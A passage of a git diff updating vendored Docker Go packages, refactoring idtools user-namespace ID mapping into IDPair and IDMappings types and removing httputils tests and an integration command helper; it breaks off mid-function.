HTTP server header -// which is in the format "docker/version (os)" eg docker/1.8.0-dev (windows). -func ParseServerHeader(hdr string) (*ServerHeader, error) { - matches := headerRegexp.FindStringSubmatch(hdr) - if len(matches) != 4 { - return nil, errInvalidHeader - } - return &ServerHeader{ - App: strings.TrimSpace(matches[1]), - Ver: strings.TrimSpace(matches[2]), - OS: strings.TrimSpace(matches[3]), - }, nil -} diff --git a/vendor/github.com/docker/docker/pkg/httputils/httputils_test.go b/vendor/github.com/docker/docker/pkg/httputils/httputils_test.go deleted file mode 100644 index d35d082156..0000000000 --- a/vendor/github.com/docker/docker/pkg/httputils/httputils_test.go +++ /dev/null @@ -1,115 +0,0 @@ -package httputils - -import ( - "fmt" - "io/ioutil" - "net/http" - "net/http/httptest" - "strings" - "testing" -) - -func TestDownload(t *testing.T) { - expected := "Hello, docker !" - ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { - fmt.Fprintf(w, expected) - })) - defer ts.Close() - response, err := Download(ts.URL) - if err != nil { - t.Fatal(err) - } - - actual, err := ioutil.ReadAll(response.Body) - response.Body.Close() - - if err != nil || string(actual) != expected { - t.Fatalf("Expected the response %q, got err:%v, response:%v, actual:%s", expected, err, response, string(actual)) - } -} - -func TestDownload400Errors(t *testing.T) { - expectedError := "Got HTTP status code >= 400: 403 Forbidden" - ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { - // 403 - http.Error(w, "something failed (forbidden)", http.StatusForbidden) - })) - defer ts.Close() - // Expected status code = 403 - if _, err := Download(ts.URL); err == nil || err.Error() != expectedError { - t.Fatalf("Expected the the error %q, got %v", expectedError, err) - } -} - -func TestDownloadOtherErrors(t *testing.T) { - if _, err := Download("I'm not an url.."); err == nil || !strings.Contains(err.Error(), "unsupported protocol scheme") { - t.Fatalf("Expected an error with 'unsupported protocol scheme', got %v", err) - } -} - -func TestNewHTTPRequestError(t *testing.T) { - errorMessage := "Some error message" - ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { - // 403 - http.Error(w, errorMessage, http.StatusForbidden) - })) - defer ts.Close() - httpResponse, err := http.Get(ts.URL) - if err != nil { - t.Fatal(err) - } - if err := NewHTTPRequestError(errorMessage, httpResponse); err.Error() != errorMessage { - t.Fatalf("Expected err to be %q, got %v", errorMessage, err) - } -} - -func TestParseServerHeader(t *testing.T) { - inputs := map[string][]string{ - "bad header": {"error"}, - "(bad header)": {"error"}, - "(without/spaces)": {"error"}, - "(header/with spaces)": {"error"}, - "foo/bar (baz)": {"foo", "bar", "baz"}, - "foo/bar": {"error"}, - "foo": {"error"}, - "foo/bar (baz space)": {"foo", "bar", "baz space"}, - " f f / b b ( b s ) ": {"f f", "b b", "b s"}, - "foo/bar (baz) ignore": {"foo", "bar", "baz"}, - "foo/bar ()": {"error"}, - "foo/bar()": {"error"}, - "foo/bar(baz)": {"foo", "bar", "baz"}, - "foo/bar/zzz(baz)": {"foo/bar", "zzz", "baz"}, - "foo/bar(baz/abc)": {"foo", "bar", "baz/abc"}, - "foo/bar(baz (abc))": {"foo", "bar", "baz (abc)"}, - } - - for header, values := range inputs { - serverHeader, err := ParseServerHeader(header) - if err != nil { - if err != errInvalidHeader { - t.Fatalf("Failed to parse %q, and got some unexpected error: %q", header, err) - } - if values[0] == "error" { - continue - } - t.Fatalf("Header %q failed to parse when it shouldn't have", header) - } - if values[0] == "error" { - t.Fatalf("Header %q parsed ok when it should have failed(%q).", header, serverHeader) - } - - if serverHeader.App != values[0] { - t.Fatalf("Expected serverHeader.App for %q to equal %q, got %q", header, values[0], serverHeader.App) - } - - if serverHeader.Ver != values[1] { - t.Fatalf("Expected serverHeader.Ver for %q to equal %q, got %q", header, values[1], serverHeader.Ver) - } - - if serverHeader.OS != values[2] { - t.Fatalf("Expected serverHeader.OS for %q to equal %q, got %q", header, values[2], serverHeader.OS) - } - - } - -} diff --git a/vendor/github.com/docker/docker/pkg/httputils/mimetype_test.go b/vendor/github.com/docker/docker/pkg/httputils/mimetype_test.go deleted file mode 100644 index 9de433ee8c..0000000000 --- a/vendor/github.com/docker/docker/pkg/httputils/mimetype_test.go +++ /dev/null @@ -1,13 +0,0 @@ -package httputils - -import ( - "testing" -) - -func TestDetectContentType(t *testing.T) { - input := []byte("That is just a plain text") - - if contentType, _, err := DetectContentType(input); err != nil || contentType != "text/plain" { - t.Errorf("TestDetectContentType failed") - } -} diff --git a/vendor/github.com/docker/docker/pkg/idtools/idtools.go b/vendor/github.com/docker/docker/pkg/idtools/idtools.go index 6bca466286..d1f173a311 100644 --- a/vendor/github.com/docker/docker/pkg/idtools/idtools.go +++ b/vendor/github.com/docker/docker/pkg/idtools/idtools.go @@ -1,4 +1,4 @@ -package idtools +package idtools // import "github.com/docker/docker/pkg/idtools" import ( "bufio" @@ -30,56 +30,50 @@ func (e ranges) Swap(i, j int) { e[i], e[j] = e[j], e[i] } func (e ranges) Less(i, j int) bool { return e[i].Start < e[j].Start } const ( - subuidFileName string = "/etc/subuid" - subgidFileName string = "/etc/subgid" + subuidFileName = "/etc/subuid" + subgidFileName = "/etc/subgid" ) -// MkdirAllAs creates a directory (include any along the path) and then modifies +// MkdirAllAndChown creates a directory (include any along the path) and then modifies // ownership to the requested uid/gid. If the directory already exists, this // function will still change ownership to the requested uid/gid pair. -func MkdirAllAs(path string, mode os.FileMode, ownerUID, ownerGID int) error { - return mkdirAs(path, mode, ownerUID, ownerGID, true, true) +func MkdirAllAndChown(path string, mode os.FileMode, owner IDPair) error { + return mkdirAs(path, mode, owner.UID, owner.GID, true, true) } -// MkdirAllNewAs creates a directory (include any along the path) and then modifies -// ownership ONLY of newly created directories to the requested uid/gid. If the -// directories along the path exist, no change of ownership will be performed -func MkdirAllNewAs(path string, mode os.FileMode, ownerUID, ownerGID int) error { - return mkdirAs(path, mode, ownerUID, ownerGID, true, false) +// MkdirAndChown creates a directory and then modifies ownership to the requested uid/gid. +// If the directory already exists, this function still changes ownership. +// Note that unlike os.Mkdir(), this function does not return IsExist error +// in case path already exists. +func MkdirAndChown(path string, mode os.FileMode, owner IDPair) error { + return mkdirAs(path, mode, owner.UID, owner.GID, false, true) } -// MkdirAs creates a directory and then modifies ownership to the requested uid/gid. -// If the directory already exists, this function still changes ownership -func MkdirAs(path string, mode os.FileMode, ownerUID, ownerGID int) error { - return mkdirAs(path, mode, ownerUID, ownerGID, false, true) +// MkdirAllAndChownNew creates a directory (include any along the path) and then modifies +// ownership ONLY of newly created directories to the requested uid/gid. If the +// directories along the path exist, no change of ownership will be performed +func MkdirAllAndChownNew(path string, mode os.FileMode, owner IDPair) error { + return mkdirAs(path, mode, owner.UID, owner.GID, true, false) } // GetRootUIDGID retrieves the remapped root uid/gid pair from the set of maps. // If the maps are empty, then the root uid/gid will default to "real" 0/0 func GetRootUIDGID(uidMap, gidMap []IDMap) (int, int, error) { - var uid, gid int - - if uidMap != nil { - xUID, err := ToHost(0, uidMap) - if err != nil { - return -1, -1, err - } - uid = xUID + uid, err := toHost(0, uidMap) + if err != nil { + return -1, -1, err } - if gidMap != nil { - xGID, err := ToHost(0, gidMap) - if err != nil { - return -1, -1, err - } - gid = xGID + gid, err := toHost(0, gidMap) + if err != nil { + return -1, -1, err } return uid, gid, nil } -// ToContainer takes an id mapping, and uses it to translate a +// toContainer takes an id mapping, and uses it to translate a // host ID to the remapped ID. If no map is provided, then the translation // assumes a 1-to-1 mapping and returns the passed in id -func ToContainer(hostID int, idMap []IDMap) (int, error) { +func toContainer(hostID int, idMap []IDMap) (int, error) { if idMap == nil { return hostID, nil } @@ -92,10 +86,10 @@ func ToContainer(hostID int, idMap []IDMap) (int, error) { return -1, fmt.Errorf("Host ID %d cannot be mapped to a container ID", hostID) } -// ToHost takes an id mapping and a remapped ID, and translates the +// toHost takes an id mapping and a remapped ID, and translates the // ID to the mapped host ID. If no map is provided, then the translation // assumes a 1-to-1 mapping and returns the passed in id # -func ToHost(contID int, idMap []IDMap) (int, error) { +func toHost(contID int, idMap []IDMap) (int, error) { if idMap == nil { return contID, nil } @@ -108,26 +102,101 @@ func ToHost(contID int, idMap []IDMap) (int, error) { return -1, fmt.Errorf("Container ID %d cannot be mapped to a host ID", contID) } -// CreateIDMappings takes a requested user and group name and +// IDPair is a UID and GID pair +type IDPair struct { + UID int + GID int +} + +// IDMappings contains a mappings of UIDs and GIDs +type IDMappings struct { + uids []IDMap + gids []IDMap +} + +// NewIDMappings takes a requested user and group name and // using the data from /etc/sub{uid,gid} ranges, creates the // proper uid and gid remapping ranges for that user/group pair -func CreateIDMappings(username, groupname string) ([]IDMap, []IDMap, error) { +func NewIDMappings(username, groupname string) (*IDMappings, error) { subuidRanges, err := parseSubuid(username) if err != nil { - return nil, nil, err + return nil, err } subgidRanges, err := parseSubgid(groupname) if err != nil { - return nil, nil, err + return nil, err } if len(subuidRanges) == 0 { - return nil, nil, fmt.Errorf("No subuid ranges found for user %q", username) + return nil, fmt.Errorf("No subuid ranges found for user %q", username) } if len(subgidRanges) == 0 { - return nil, nil, fmt.Errorf("No subgid ranges found for group %q", groupname) + return nil, fmt.Errorf("No subgid ranges found for group %q", groupname) } - return createIDMap(subuidRanges), createIDMap(subgidRanges), nil + return &IDMappings{ + uids: createIDMap(subuidRanges), + gids: createIDMap(subgidRanges), + }, nil +} + +// NewIDMappingsFromMaps creates a new mapping from two slices +// Deprecated: this is a temporary shim while transitioning to IDMapping +func NewIDMappingsFromMaps(uids []IDMap, gids []IDMap) *IDMappings { + return &IDMappings{uids: uids, gids: gids} +} + +// RootPair returns a uid and gid pair for the root user. The error is ignored +// because a root user always exists, and the defaults are correct when the uid +// and gid maps are empty. +func (i *IDMappings) RootPair() IDPair { + uid, gid, _ := GetRootUIDGID(i.uids, i.gids) + return IDPair{UID: uid, GID: gid} +} + +// ToHost returns the host UID and GID for the container uid, gid. +// Remapping is only performed if the ids aren't already the remapped root ids +func (i *IDMappings) ToHost(pair IDPair) (IDPair, error) { + var err error + target := i.RootPair() + + if pair.UID != target.UID { + target.UID, err = toHost(pair.UID, i.uids) + if err != nil { + return target, err + } + } + + if pair.GID != target.GID { + target.GID, err = toHost(pair.GID, i.gids) + } + return target, err +} + +// ToContainer returns the container UID and GID for the host uid and gid +func (i *IDMappings) ToContainer(pair IDPair) (int, int, error) { + uid, err := toContainer(pair.UID, i.uids) + if err != nil { + return -1, -1, err + } + gid, err := toContainer(pair.GID, i.gids) + return uid, gid, err +} + +// Empty returns true if there are no id mappings +func (i *IDMappings) Empty() bool { + return len(i.uids) == 0 && len(i.gids) == 0 +} + +// UIDs return the UID mapping +// TODO: remove this once everything has been refactored to use pairs +func (i *IDMappings) UIDs() []IDMap { + return i.uids +} + +// GIDs return the UID mapping +// TODO: remove this once everything has been refactored to use pairs +func (i *IDMappings) GIDs() []IDMap { + return i.gids } func createIDMap(subidRanges ranges) []IDMap { diff --git a/vendor/github.com/docker/docker/pkg/idtools/idtools_unix.go b/vendor/github.com/docker/docker/pkg/idtools/idtools_unix.go index f9eb31c3ec..1d87ea3bcb 100644 --- a/vendor/github.com/docker/docker/pkg/idtools/idtools_unix.go +++ b/vendor/github.com/docker/docker/pkg/idtools/idtools_unix.go @@ -1,6 +1,6 @@ // +build !windows -package idtools +package idtools // import "github.com/docker/docker/pkg/idtools" import ( "bytes" @@ -10,6 +10,7 @@ import ( "path/filepath" "strings" "sync" + "syscall" "github.com/docker/docker/pkg/system" "github.com/opencontainers/runc/libcontainer/user" @@ -26,17 +27,22 @@ func mkdirAs(path string, mode os.FileMode, ownerUID, ownerGID int, mkAll, chown // so that we can chown all of them properly at the end. If chownExisting is false, we won't // chown the full directory path if it exists var paths []string - if _, err := os.Stat(path); err != nil && os.IsNotExist(err) { - paths = []string{path} - } else if err == nil && chownExisting { - if err := os.Chown(path, ownerUID, ownerGID); err != nil { - return err + + stat, err := system.Stat(path) + if err == nil { + if !stat.IsDir() { + return &os.PathError{Op: "mkdir", Path: path, Err: syscall.ENOTDIR} + } + if !chownExisting { + return nil } + // short-circuit--we were called with an existing directory and chown was requested - return nil - } else if err == nil { - // nothing to do; directory path fully exists already and chown was NOT requested - return nil + return lazyChown(path, ownerUID, ownerGID, stat) + } + + if os.IsNotExist(err) { + paths = []string{path} } if mkAll { @@ -52,7 +58,7 @@ func mkdirAs(path string, mode os.FileMode, ownerUID, ownerGID int, mkAll, chown paths = append(paths, dirPath) } } - if err := system.MkdirAll(path, mode); err != nil && !os.IsExist(err) { + if err := system.MkdirAll(path, mode, ""); err != nil { return err } } else { @@ -63,7 +69,7 @@ func mkdirAs(path string, mode os.FileMode, ownerUID, ownerGID int, mkAll, chown // even if it existed, we will chown the requested path + any subpaths that // didn't exist when we called MkdirAll for _, pathComponent := range paths { - if err := os.Chown(pathComponent, ownerUID, ownerGID); err != nil { + if err := lazyChown(pathComponent, ownerUID, ownerGID, nil); err != nil { return err } } @@ -72,15 +78,15 @@ func mkdirAs(path string, mode os.FileMode, ownerUID, ownerGID int, mkAll, chown // CanAccess takes a valid (existing) directory and a uid, gid pair and determines // if that uid, gid pair has access (execute bit) to the directory -func CanAccess(path string, uid, gid int) bool { +func CanAccess(path string, pair IDPair) bool { statInfo, err := system.Stat(path) if err != nil { return false } fileMode := os.FileMode(statInfo.Mode()) permBits := fileMode.Perm() - return accessible(statInfo.UID() == uint32(uid), - statInfo.GID() == uint32(gid), permBits) + return accessible(statInfo.UID() == uint32(pair.UID), + statInfo.GID() == uint32(pair.GID), permBits) } func accessible(isOwner, isGroup bool, perms os.FileMode) bool { @@ -205,3 +211,20 @@ func callGetent(args string) (io.Reader, error) { } return bytes.NewReader(out), nil } + +// lazyChown performs a chown only if the uid/gid don't match what's requested +// Normally a Chown is a no-op if uid/gid match, but in some cases this can still cause an error, e.g. if the +// dir is on an NFS share, so don't call chown unless we absolutely must. +func lazyChown(p string, uid, gid int, stat *system.StatT) error { + if stat == nil { + var err error + stat, err = system.Stat(p) + if err != nil { + return err + } + } + if stat.UID() == uint32(uid) && stat.GID() == uint32(gid) { + return nil + } + return os.Chown(p, uid, gid) +} diff --git a/vendor/github.com/docker/docker/pkg/idtools/idtools_unix_test.go b/vendor/github.com/docker/docker/pkg/idtools/idtools_unix_test.go index 540d3079ee..608000a66b 100644 --- a/vendor/github.com/docker/docker/pkg/idtools/idtools_unix_test.go +++ b/vendor/github.com/docker/docker/pkg/idtools/idtools_unix_test.go @@ -1,14 +1,23 @@ // +build !windows -package idtools +package idtools // import "github.com/docker/docker/pkg/idtools" import ( "fmt" "io/ioutil" "os" + "os/user" "path/filepath" - "syscall" "testing" + + "golang.org/x/sys/unix" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" +) + +const ( + tempUser = "tempuser" ) type node struct { @@ -16,7 +25,8 @@ type node struct { gid int } -func TestMkdirAllAs(t *testing.T) { +func TestMkdirAllAndChown(t *testing.T) { + RequiresRoot(t) dirName, err := ioutil.TempDir("", "mkdirall") if err != nil { t.Fatalf("Couldn't create temp dir: %v", err) @@ -36,7 +46,7 @@ func TestMkdirAllAs(t *testing.T) { } // test adding a directory to a pre-existing dir; only the new dir is owned by the uid/gid - if err := MkdirAllAs(filepath.Join(dirName, "usr", "share"), 0755, 99, 99); err != nil { + if err := MkdirAllAndChown(filepath.Join(dirName, "usr", "share"), 0755, IDPair{UID: 99, GID: 99}); err != nil { t.Fatal(err) } testTree["usr/share"] = node{99, 99} @@ -49,7 +59,7 @@ func TestMkdirAllAs(t *testing.T) { } // test 2-deep new directories--both should be owned by the uid/gid pair - if err := MkdirAllAs(filepath.Join(dirName, "lib", "some", "other"), 0755, 101, 101); err != nil { + if err := MkdirAllAndChown(filepath.Join(dirName, "lib", "some", "other"), 0755, IDPair{UID: 101, GID: 101}); err != nil { t.Fatal(err) } testTree["lib/some"] = node{101, 101} @@ -63,7 +73,7 @@ func TestMkdirAllAs(t *testing.T) { } // test a directory that already exists; should be chowned, but nothing else - if err := MkdirAllAs(filepath.Join(dirName, "usr"), 0755, 102, 102); err != nil { + if err := MkdirAllAndChown(filepath.Join(dirName, "usr"), 0755, IDPair{UID: 102, GID: 102}); err != nil { t.Fatal(err) } testTree["usr"] = node{102, 102} @@ -76,12 +86,10 @@ func TestMkdirAllAs(t *testing.T) { } } -func TestMkdirAllNewAs(t *testing.T) { - +func TestMkdirAllAndChownNew(t *testing.T) { + RequiresRoot(t) dirName, err := ioutil.TempDir("", "mkdirnew") - if err != nil { - t.Fatalf("Couldn't create temp dir: %v", err) - } + assert.NilError(t, err) defer os.RemoveAll(dirName) testTree := map[string]node{ @@ -91,53 +99,36 @@ func TestMkdirAllNewAs(t *testing.T) { "lib/x86_64": {45, 45}, "lib/x86_64/share": {1, 1}, } - - if err := buildTree(dirName, testTree); err != nil { - t.Fatal(err) - } + assert.NilError(t, buildTree(dirName, testTree)) // test adding a directory to a pre-existing dir; only the new dir is owned by the uid/gid - if err := MkdirAllNewAs(filepath.Join(dirName, "usr", "share"), 0755, 99, 99); err != nil { - t.Fatal(err) - } + err = MkdirAllAndChownNew(filepath.Join(dirName, "usr", "share"), 0755, IDPair{UID: 99, GID: 99}) + assert.NilError(t, err) + testTree["usr/share"] = node{99, 99} verifyTree, err := readTree(dirName, "") - if err != nil { - t.Fatal(err) - } - if err := compareTrees(testTree, verifyTree); err != nil { - t.Fatal(err) - } + assert.NilError(t, err) + assert.NilError(t, compareTrees(testTree, verifyTree)) // test 2-deep new directories--both should be owned by the uid/gid pair - if err := MkdirAllNewAs(filepath.Join(dirName, "lib", "some", "other"), 0755, 101, 101); err != nil { - t.Fatal(err) - } + err = MkdirAllAndChownNew(filepath.Join(dirName, "lib", "some", "other"), 0755, IDPair{UID: 101, GID: 101}) + assert.NilError(t, err) testTree["lib/some"] = node{101, 101} testTree["lib/some/other"] = node{101, 101} verifyTree, err = readTree(dirName, "") - if err != nil { - t.Fatal(err) - } - if err := compareTrees(testTree, verifyTree); err != nil { - t.Fatal(err) - } + assert.NilError(t, err) + assert.NilError(t, compareTrees(testTree, verifyTree)) // test a directory that already exists; should NOT be chowned - if err := MkdirAllNewAs(filepath.Join(dirName, "usr"), 0755, 102, 102); err != nil { - t.Fatal(err) - } + err = MkdirAllAndChownNew(filepath.Join(dirName, "usr"), 0755, IDPair{UID: 102, GID: 102}) + assert.NilError(t, err) verifyTree, err = readTree(dirName, "") - if err != nil { - t.Fatal(err) - } - if err := compareTrees(testTree, verifyTree); err != nil { - t.Fatal(err) - } + assert.NilError(t, err) + assert.NilError(t, compareTrees(testTree, verifyTree)) } -func TestMkdirAs(t *testing.T) { - +func TestMkdirAndChown(t *testing.T) { + RequiresRoot(t) dirName, err := ioutil.TempDir("", "mkdir") if err != nil { t.Fatalf("Couldn't create temp dir: %v", err) @@ -152,7 +143,7 @@ func TestMkdirAs(t *testing.T) { } // test a directory that already exists; should just chown to the requested uid/gid - if err := MkdirAs(filepath.Join(dirName, "usr"), 0755, 99, 99); err != nil { + if err := MkdirAndChown(filepath.Join(dirName, "usr"), 0755, IDPair{UID: 99, GID: 99}); err != nil { t.Fatal(err) } testTree["usr"] = node{99, 99} @@ -165,12 +156,12 @@ func TestMkdirAs(t *testing.T) { } // create a subdir under a dir which doesn't exist--should fail - if err := MkdirAs(filepath.Join(dirName, "usr", "bin", "subdir"), 0755, 102, 102); err == nil { + if err := MkdirAndChown(filepath.Join(dirName, "usr", "bin", "subdir"), 0755, IDPair{UID: 102, GID: 102}); err == nil { t.Fatalf("Trying to create a directory with Mkdir where the parent doesn't exist should have failed") } // create a subdir under an existing dir; should only change the ownership of the new subdir - if err := MkdirAs(filepath.Join(dirName, "usr", "bin"), 0755, 102, 102); err != nil { + if err := MkdirAndChown(filepath.Join(dirName, "usr", "bin"), 0755, IDPair{UID: 102, GID: 102}); err != nil { t.Fatal(err) } testTree["usr/bin"] = node{102, 102} @@ -205,8 +196,8 @@ func readTree(base, root string) (map[string]node, error) { } for _, info := range dirInfos { - s := &syscall.Stat_t{} - if err := syscall.Stat(filepath.Join(base, info.Name()), s); err != nil { + s := &unix.Stat_t{} + if err := unix.Stat(filepath.Join(base, info.Name()), s); err != nil { return nil, fmt.Errorf("Can't stat file %q: %v", filepath.Join(base, info.Name()), err) } tree[filepath.Join(root, info.Name())] = node{int(s.Uid), int(s.Gid)} @@ -242,6 +233,11 @@ func compareTrees(left, right map[string]node) error { return nil } +func delUser(t *testing.T, name string) { + _, err := execCmd("userdel", name) + assert.Check(t, err) +} + func TestParseSubidFileWithNewlinesAndComments(t *testing.T) { tmpDir, err := ioutil.TempDir("", "parsesubid") if err != nil { @@ -269,3 +265,133 @@ dockremap:231072:65536` t.Fatalf("wanted 65536, got %d instead", ranges[0].Length) } } + +func TestGetRootUIDGID(t *testing.T) { + uidMap := []IDMap{ + { + ContainerID: 0, + HostID: os.Getuid(), + Size: 1, + }, + } + gidMap := []IDMap{ + { + ContainerID: 0, + HostID: os.Getgid(), + Size: 1, + }, + } + + uid, gid, err := GetRootUIDGID(uidMap, gidMap) + assert.Check(t, err) + assert.Check(t, is.Equal(os.Geteuid(), uid)) + assert.Check(t, is.Equal(os.Getegid(), gid)) + + uidMapError := []IDMap{ + { + ContainerID: 1, + HostID: os.Getuid(), + Size: 1, + }, + } + _, _, err = GetRootUIDGID(uidMapError, gidMap) + assert.Check(t, is.Error(err, "Container ID 0 cannot be mapped to a host ID")) +} + +func TestToContainer(t *testing.T) { + uidMap := []IDMap{ + { + ContainerID: 2, + HostID: 2, + Size: 1, + }, + } + + containerID, err := toContainer(2, uidMap) + assert.Check(t, err) + assert.Check(t, is.Equal(uidMap[0].ContainerID, containerID)) +} + +func TestNewIDMappings(t *testing.T) { + RequiresRoot(t) + _, _, err := AddNamespaceRangesUser(tempUser) + assert.Check(t, err) + defer delUser(t, tempUser) + + tempUser, err := user.Lookup(tempUser) + assert.Check(t, err) + + gids, err := tempUser.GroupIds() + assert.Check(t, err) + group, err := user.LookupGroupId(string(gids[0])) + assert.Check(t, err) + + idMappings, err := NewIDMappings(tempUser.Username, group.Name) + assert.Check(t, err) + + rootUID, rootGID, err := GetRootUIDGID(idMappings.UIDs(), idMappings.GIDs()) + assert.Check(t, err) + + dirName, err := ioutil.TempDir("", "mkdirall") + assert.Check(t, err, "Couldn't create temp directory") + defer os.RemoveAll(dirName) + + err = MkdirAllAndChown(dirName, 0700, IDPair{UID: rootUID, GID: rootGID}) + assert.Check(t, err, "Couldn't change ownership of file path. Got error") + assert.Check(t, CanAccess(dirName, idMappings.RootPair()), fmt.Sprintf("Unable to access %s directory with user UID:%d and GID:%d", dirName, rootUID, rootGID)) +} + +func TestLookupUserAndGroup(t *testing.T) { + RequiresRoot(t) + uid, gid, err := AddNamespaceRangesUser(tempUser) + assert.Check(t, err) + defer delUser(t, tempUser) + + fetchedUser, err := LookupUser(tempUser) + assert.Check(t, err) + + fetchedUserByID, err := LookupUID(uid) + assert.Check(t, err) + assert.Check(t, is.DeepEqual(fetchedUserByID, fetchedUser)) + + fetchedGroup, err := LookupGroup(tempUser) + assert.Check(t, err) + + fetchedGroupByID, err := LookupGID(gid) + assert.Check(t, err) + assert.Check(t, is.DeepEqual(fetchedGroupByID, fetchedGroup)) +} + +func TestLookupUserAndGroupThatDoesNotExist(t *testing.T) { + fakeUser := "fakeuser" + _, err := LookupUser(fakeUser) + assert.Check(t, is.Error(err, "getent unable to find entry \""+fakeUser+"\" in passwd database")) + + _, err = LookupUID(-1) + assert.Check(t, is.ErrorContains(err, "")) + + fakeGroup := "fakegroup" + _, err = LookupGroup(fakeGroup) + assert.Check(t, is.Error(err, "getent unable to find entry \""+fakeGroup+"\" in group database")) + + _, err = LookupGID(-1) + assert.Check(t, is.ErrorContains(err, "")) +} + +// TestMkdirIsNotDir checks that mkdirAs() function (used by MkdirAll...) +// returns a correct error in case a directory which it is about to create +// already exists but is a file (rather than a directory). +func TestMkdirIsNotDir(t *testing.T) { + file, err := ioutil.TempFile("", t.Name()) + if err != nil { + t.Fatalf("Couldn't create temp dir: %v", err) + } + defer os.Remove(file.Name()) + + err = mkdirAs(file.Name(), 0755, 0, 0, false, false) + assert.Check(t, is.Error(err, "mkdir "+file.Name()+": not a directory")) +} + +func RequiresRoot(t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") +} diff --git a/vendor/github.com/docker/docker/pkg/idtools/idtools_windows.go b/vendor/github.com/docker/docker/pkg/idtools/idtools_windows.go index 49f67e78c1..d72cc28929 100644 --- a/vendor/github.com/docker/docker/pkg/idtools/idtools_windows.go +++ b/vendor/github.com/docker/docker/pkg/idtools/idtools_windows.go @@ -1,6 +1,4 @@ -// +build windows - -package idtools +package idtools // import "github.com/docker/docker/pkg/idtools" import ( "os" @@ -11,7 +9,7 @@ import ( // Platforms such as Windows do not support the UID/GID concept. So make this // just a wrapper around system.MkdirAll. func mkdirAs(path string, mode os.FileMode, ownerUID, ownerGID int, mkAll, chownExisting bool) error { - if err := system.MkdirAll(path, mode); err != nil && !os.IsExist(err) { + if err := system.MkdirAll(path, mode, ""); err != nil { return err } return nil @@ -20,6 +18,6 @@ func mkdirAs(path string, mode os.FileMode, ownerUID, ownerGID int, mkAll, chown // CanAccess takes a valid (existing) directory and a uid, gid pair and determines // if that uid, gid pair has access (execute bit) to the directory // Windows does not require/support this function, so always return true -func CanAccess(path string, uid, gid int) bool { +func CanAccess(path string, pair IDPair) bool { return true } diff --git a/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_linux.go b/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_linux.go index 9da7975e2c..6272c5a404 100644 --- a/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_linux.go +++ b/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_linux.go @@ -1,4 +1,4 @@ -package idtools +package idtools // import "github.com/docker/docker/pkg/idtools" import ( "fmt" diff --git a/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_unsupported.go b/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_unsupported.go index d98b354cbd..e7c4d63118 100644 --- a/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_unsupported.go +++ b/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_unsupported.go @@ -1,6 +1,6 @@ // +build !linux -package idtools +package idtools // import "github.com/docker/docker/pkg/idtools" import "fmt" diff --git a/vendor/github.com/docker/docker/pkg/idtools/utils_unix.go b/vendor/github.com/docker/docker/pkg/idtools/utils_unix.go index 9703ecbd9d..903ac4501b 100644 --- a/vendor/github.com/docker/docker/pkg/idtools/utils_unix.go +++ b/vendor/github.com/docker/docker/pkg/idtools/utils_unix.go @@ -1,6 +1,6 @@ // +build !windows -package idtools +package idtools // import "github.com/docker/docker/pkg/idtools" import ( "fmt" diff --git a/vendor/github.com/docker/docker/pkg/integration/cmd/command.go b/vendor/github.com/docker/docker/pkg/integration/cmd/command.go deleted file mode 100644 index 76d04e8df5..0000000000 --- a/vendor/github.com/docker/docker/pkg/integration/cmd/command.go +++ /dev/null @@ -1,294 +0,0 @@ -package cmd - -import ( - "bytes" - "fmt" - "io" - "os/exec" - "path/filepath" - "runtime" - "strings" - "sync" - "time" - - "github.com/docker/docker/pkg/system" - "github.com/go-check/check" -) - -type testingT interface { - Fatalf(string, ...interface{}) -} - -const ( - // None is a token to inform Result.Assert that the output should be empty - None string = "" -) - -type lockedBuffer struct { - m sync.RWMutex - buf bytes.Buffer -} - -func (buf *lockedBuffer) Write(b []byte) (int, error) { - buf.m.Lock() - defer buf.m.Unlock() - return buf.buf.Write(b) -} - -func (buf *lockedBuffer) String() string { - buf.m.RLock() - defer buf.m.RUnlock() - return buf.buf.String() -} - -// Result stores the result of running a command -type Result struct { - Cmd *exec.Cmd - ExitCode int - Error error - // Timeout is true if the command was killed because it ran for too long - Timeout bool - outBuffer *lockedBuffer - errBuffer *lockedBuffer -} - -// Assert compares the Result against the Expected struct, and fails the test if -// any of the expcetations are not met. -func (r *Result) Assert(t testingT, exp Expected) { - err := r.Compare(exp) - if err == nil { - return - } - - _, file, line, _ := runtime.Caller(1) - t.Fatalf("at %s:%d\n%s", filepath.Base(file), line, err.Error()) -} - -// Compare returns an formatted error with the command, stdout, stderr, exit -// code, and any failed expectations -func (r *Result) Compare(exp Expected) error { - errors := []string{} - add := func(format string, args ...interface{}) { - errors = append(errors, fmt.Sprintf(format, args...)) - } - - if exp.ExitCode != r.ExitCode { - add("ExitCode was %d expected %d", r.ExitCode, exp.ExitCode) - } - if exp.Timeout != r.Timeout { - if exp.Timeout { - add("Expected command to timeout") - } else { - add("Expected command to finish, but it hit the timeout") - } - } - if !matchOutput(exp.Out, r.Stdout()) { - add("Expected stdout to contain %q", exp.Out) - } - if !matchOutput(exp.Err, r.Stderr()) { - add("Expected stderr to contain %q", exp.Err) - } - switch { - // If a non-zero exit code is expected there is going to be an error. - // Don't require an error message as well as an exit code because the - // error message is going to be "exit status which is not useful - case exp.Error == "" && exp.ExitCode != 0: - case exp.Error == "" && r.Error != nil: - add("Expected no error") - case exp.Error != "" && r.Error == nil: - add("Expected error to contain %q, but there was no error", exp.Error) - case exp.Error != "" && !strings.Contains(r.Error.Error(), exp.Error): - add("Expected error to contain %q", exp.Error) - } - - if len(errors) == 0 { - return nil - } - return fmt.Errorf("%s\nFailures:\n%s\n", r, strings.Join(errors, "\n")) -} - -func matchOutput(expected string, actual string) bool { - switch expected { - case None: - return actual == "" - default: - return strings.Contains(actual, expected) - } -} - -func (r *Result) String() string { - var timeout string - if r.Timeout { - timeout = " (timeout)" - } - - return fmt.Sprintf(` -Command: %s -ExitCode: %d%s, Error: %s -Stdout: %v -Stderr: %v -`, - strings.Join(r.Cmd.Args, " "), - 